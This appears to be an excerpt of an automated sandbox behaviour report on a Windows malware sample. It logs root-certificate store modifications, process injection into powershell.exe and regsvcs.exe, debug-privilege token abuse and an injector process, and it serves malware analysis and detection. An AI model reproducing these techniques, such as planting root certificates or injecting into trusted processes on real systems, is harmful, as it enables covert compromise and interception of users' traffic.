Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
N/A N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
N/A N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
N/A N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
N/A N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
N/A N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
N/A N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
N/A N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
N/A N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
N/A N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
N/A N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
N/A N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u25w.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u25w.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2236 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
